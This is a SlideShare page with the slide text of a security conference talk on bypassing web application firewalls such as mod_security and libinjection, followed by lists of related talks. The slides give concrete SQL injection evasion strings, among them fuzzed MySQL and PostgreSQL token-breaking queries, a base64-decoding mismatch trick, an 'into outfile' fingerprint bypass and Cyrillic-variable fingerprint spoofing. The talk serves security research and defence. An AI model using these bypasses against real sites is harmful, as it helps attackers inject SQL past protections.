SlideShare a Scribd company logo

Lie to Me: Bypassing Modern Web Application Firewalls

Ivan Novikov
Ivan Novikov

The report considers analysis of modern Web Application Firewalls. The author provides comparison of attack detection algorithms and discusses their advantages and disadvantages. The talk includes examples of bypassing protection mechanisms. The author points out the necessity of discovering a universal method of masquerading for vectors of various attacks via WAFs for different algorithms.

Technology
1 of 38
Download to read offline
bypassing modern web application firewalls @ONsec_lab, http://lab.onsec.ru
About • Security audits of webapps since 2009 • @d0znpp twitter • @ONsec_lab twitter • Nice blog! http://lab.onsec.ru - [ENG] • d0znpp[at]ONsec[dot]ru еmаi1
WTF WAF? • Web Application Firewall • Prevent attacks • Attack !=Vulnerability • Risk != Attack
SoftwareVS Hardware • Different HTTP parsers • Many «hardware» WAFs used Apache, Lighttpd, Nginx forks
Implementation • Failover bypass: • DoS/DDoS WAF for bypass it- why not?! • What happens with traffic when your filter is overloaded? • XML, regexp, token bombs for this • Not so silently, right? :)
WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
Protocol level bug looks like abyss
Parse HTTP packets • First read: «Protocol-Level Evasion of Web Application Firewalls», Ivan Ristic, BH- US-2012 • Nice yesterday bypass Imperva by @webpentest during PHDays WAF bypass contest: Content-Type: invalid :))) • Classic example - HTTP Parameter Pollution • Are you sure that WAF’s and webapp’s HTTP protocols are the same?
WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
Data normalization level bug looks like tunnel
Data normalization • Format parsers, for example: • base64 • xml • JSON • Are you sure that WAF’s and webapp’s parsers are the same?
Data normalization • mod_security, t:base64decode • decode string until first = char • PHP, base64_decode($strict=false) • decode whole string • Attack vector • YWFh=attackhere • Use t:base64DecodeExt!
Data normalization • Yet another example from yesterday PHDays WAF bypass contest - Imperva XML decoding • First decode XML, that validate attacks • XML input was not set up as XML type in WAF • Put attack as XML-encoded data (entities) to bypass regexpr: union select 123
WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
Detection logic bug looks like ninja
Detection logic • Regular expressions (mod_security, etc) • Tokenizers (libinjection) • ...
SQL syntax • First read this works: • http://websec.wordpress.com/tag/sql- obfuscation/ • http://www.slideshare.net/nickgsuperstar/ new-techniques-in-sql-obfuscation • Obfuscated vector is more than welcome! • Try to exploit
SQL syntax - time to fuzzing! • SELECT{$P1} 1 FROM... • ...UNION{$P2}FROM... • SELECT VERSION{$P3}() • SELECT{$P4}VERSION{P4}() • SELECT 1{P5}BAD
MySQL: the classics • SELECT{U} 1 FROM • ...UNION{U}FROM... • SELECT VERSION{U}() • {U} = [0x09,0x0A-0x0D,0x20,0xA0]* • Fuzzed only 1-bytes sequences, not /**/, etc
MySQL: time to fuzzing! • SELECT{F}VERSION{F}() • SELECT 1{D}BAD • {F} = {U} + 0x60 (backquote `) • {D} = # + 0x60 • Have a fun with regexp: • select`version` ( ) • ... where id=’1’`’ and ... - commented now
MySQL: break tokens! • SELECT{O}1 FROM test • {O} = [-+!~@] • SELECT 1{W}FROM test; • {W} = [.d?|ed] • Part of this discovered during our WAF bypass contest last year by @Black2Fan
MySQL: break tokens! • SELECT-1e1FROM test • SELECT~1.FROM test • SELECTNFROM test • SELECT@^1.FROM test • SELECT-id-1.FROM test • all tested on MySQL 5.1.66-0-squeeze1
Postgres: the classics • SELECT{U} 1 FROM • ...UNION{U}FROM... • SELECT VERSION{U}() • {U} = [0x09,0x0A,0x0C,0x0D,0x20]* • Fuzzed only 1-bytes sequences, not /**/, etc
Postgres: time to fuzz! • SELECT{F}VERSION{F}() • SELECT 1{D}BAD • {F} = {U} + 0x22 (doblequote ‘’) • {D} = # + 0x22 • Have a fun with regexp: • select’’version’’ ( ) • ... where id=’1’`’ and ... - commented now
Postgres: break tokens! • SELECT{O}1 FROM test • {O} = [.-+!~@] - @ is absolute operator • SELECT 1{W}FROM test; • {W} = [.d?|ed|] - nothing is also OK!
Postgres: break tokens! • SELECT-1ROM test • SELECT.1FROM test • SELECT~1FROM test • SELECT-id-1FROM test • SELECT-id-1FROM test • all tested on PostgreSQL 9.2.4
Time to exploit! • mod_security • libinjection • others?
mod_security • CRS (https://github.com/SpiderLabs/owasp- modsecurity-crs) • base_rules • many regular expressions
mod_security • ?id=select id from test • ?id=select-id-1.from test Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:unions*?(?:all| d i s t i n c t | [ ( ! @ ] * ? ) ? s * ? [ ( [ ] * ? s * ? s e l e c t s + ) | ( ? : w + s + l i ke s + [ " ' ` xc2xb4xe2x80x99xe2x80x98])|(?:likes*?["'`xc2xb4xe2x80x99xe2x80x98]%)| (?:["'`xc2xb4xe2x80x99xe2x80x98]s*?likeW*?["'`xc2xb4 ..." at ARGS:id. [file "/ opt/modsecurity/rules/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: select id from found within ARGS:id: select id from test"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"]
mod_security • ?id=1 or 1=1 or • ?id=1 or true or Message: Access denied with code 403 (phase 2). Pattern match "(?i:([s'"` x c 2 x b 4 x e 2 x 8 0 x 9 9 x e 2 x 8 0 x 9 8 ( ) ] * ? ) ( [ d w ] + + ) ( [ s ' " ` xc2xb4xe2x80x99xe2x80x98()]*?)(?:(?:=|<=>|r?like|soundss+like|regexp)([s'"` xc2xb4xe2x80x99xe2x80x98()]*?)2|(?:!=|<=|>=|<>|<|>|^|iss+not|not ..." at A R G S : i d . [ fi l e " / o p t / m o d s e c u r i t y / r u l e s / b a s e _ r u l e s / modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1=1 found within ARGS:id: 1 or 1=1 or "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/ WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/ 6.5.2"]
libinjection • Token based detection • No more regexp! • Fingerprint for each attack 1-5 tokens sequence • 14 token types, 14^5+14^4+14^3+14^2+14 ~= 580k possible fingerprints • Is it enough to block all SQLi?
libinjection • Bytes obfuscation doesn’t works now • But... • What happens if you missed some tokens?
Attack #1. Missed token / fingerprint • As fuzzed above ` 0x60 byte can be used as a comment in MySQL and also as function quotes • ' into outfile 'asd' -- • block - skksc • ' into outfile 'asd' ` • bypass - skksn
Attack #2.Token obfuscation • Find any unblocked fingerprint • Obfuscate your attack to produce the same fingerprint • Fingerprint have only 5 tokens • Need to exploit anti-obfuscation logic (1+1 and others hardcoded token combinations)
Attack #2.Token obfuscation • Fingerprint «v1111» looks like safe • @a1a2a3a4 - variable but fingerprint of this string is «v», no numeric token here • @ф1й2у3ц4 - is valid variable for MySQL, but produce fingerprint «v1111» • @ф1й2у3ц4 union select ... produce fingerprint «v1111» also :)
Some stats • Hacking WAFs since 2009 • About 50 different implementations • About 10 different engines • Time to hack: • min: 3 min • max: 19 hours • average: 1hour
Questions? • @d0znpp twitter • @ONsec_lab twitter • Nice blog! http://lab.onsec.ru - [ENG] • d0znpp[at]ONsec[dot]ru еmаi1

Recommended

A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 

Recommended

A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
HTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsHTTP Request Smuggling via higher HTTP versions
HTTP Request Smuggling via higher HTTP versionsneexemil
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypassДмитрий Бумов
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified...Garage4hackers.com
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...joaomatosf_
 
Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Ben Hayak
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterMasato Kinugawa
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Ch 3: Web Application Technologies
Ch 3: Web Application TechnologiesCh 3: Web Application Technologies
Ch 3: Web Application TechnologiesSam Bowne
 
Detecting headless browsers
Detecting headless browsersDetecting headless browsers
Detecting headless browsersSergey Shekyan
 
CNIT 129S: Ch 3: Web Application Technologies
CNIT 129S: Ch 3: Web Application TechnologiesCNIT 129S: Ch 3: Web Application Technologies
CNIT 129S: Ch 3: Web Application TechnologiesSam Bowne
 
Pentester's Mindset! - Ravikumar Paghdal
Pentester's Mindset! - Ravikumar PaghdalPentester's Mindset! - Ravikumar Paghdal
Pentester's Mindset! - Ravikumar PaghdalNSConclave
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)Ivan Novikov
 

More Related Content

What's hot

Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...joaomatosf_
 
Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Ben Hayak
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015CODE BLUE
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterMasato Kinugawa
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Ch 3: Web Application Technologies
Ch 3: Web Application TechnologiesCh 3: Web Application Technologies
Ch 3: Web Application TechnologiesSam Bowne
 
Detecting headless browsers
Detecting headless browsersDetecting headless browsers
Detecting headless browsersSergey Shekyan
 
CNIT 129S: Ch 3: Web Application Technologies
CNIT 129S: Ch 3: Web Application TechnologiesCNIT 129S: Ch 3: Web Application Technologies
CNIT 129S: Ch 3: Web Application TechnologiesSam Bowne
 
Pentester's Mindset! - Ravikumar Paghdal
Pentester's Mindset! - Ravikumar PaghdalPentester's Mindset! - Ravikumar Paghdal
Pentester's Mindset! - Ravikumar PaghdalNSConclave
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionSoroush Dalili
 

What's hot (20)

Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
An Overview of Deserialization Vulnerabilities in the Java Virtual Machine (J...
 
Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)Same Origin Method Execution (BlackHat EU2014)
Same Origin Method Execution (BlackHat EU2014)
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications security
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
Ch 3: Web Application Technologies
Ch 3: Web Application TechnologiesCh 3: Web Application Technologies
Ch 3: Web Application Technologies
 
Detecting headless browsers
Detecting headless browsersDetecting headless browsers
Detecting headless browsers
 
CNIT 129S: Ch 3: Web Application Technologies
CNIT 129S: Ch 3: Web Application TechnologiesCNIT 129S: Ch 3: Web Application Technologies
CNIT 129S: Ch 3: Web Application Technologies
 
Pentester's Mindset! - Ravikumar Paghdal
Pentester's Mindset! - Ravikumar PaghdalPentester's Mindset! - Ravikumar Paghdal
Pentester's Mindset! - Ravikumar Paghdal
 
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 EditionGoing Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition
 

Viewers also liked

Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)Ivan Novikov
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknessesIvan Novikov
 
New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20Nick Galbreath
 
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)OWASP Ottawa
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseNoaman Aziz
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationSandro Gauci
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Automated and unified opensource web application testing
Automated and unified opensource web application testingAutomated and unified opensource web application testing
Automated and unified opensource web application testingnavajanegra
 
Proactive approach
Proactive approachProactive approach
Proactive approachIvan Novikov
 
Методы разработки качественного и чистого кода
Методы разработки качественного и чистого кодаМетоды разработки качественного и чистого кода
Методы разработки качественного и чистого кодаIvan Novikov
 
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...OWASP Russia
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any meansMoabi.com
 
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris SavkovOWASP Russia
 
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...OWASP Russia
 
[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler CollectionMoabi.com
 

Viewers also liked (20)

Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
 
OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknesses
 
New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20
 
XPath Injection
XPath InjectionXPath Injection
XPath Injection
 
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackrose
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And Exploitation
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
DNS Exfiltration Using sqlmap
DNS Exfiltration Using sqlmapDNS Exfiltration Using sqlmap
DNS Exfiltration Using sqlmap
 
Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
 
Automated and unified opensource web application testing
Automated and unified opensource web application testingAutomated and unified opensource web application testing
Automated and unified opensource web application testing
 
Proactive approach
Proactive approachProactive approach
Proactive approach
 
Методы разработки качественного и чистого кода
Методы разработки качественного и чистого кодаМетоды разработки качественного и чистого кода
Методы разработки качественного и чистого кода
 
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means
 
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
 
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
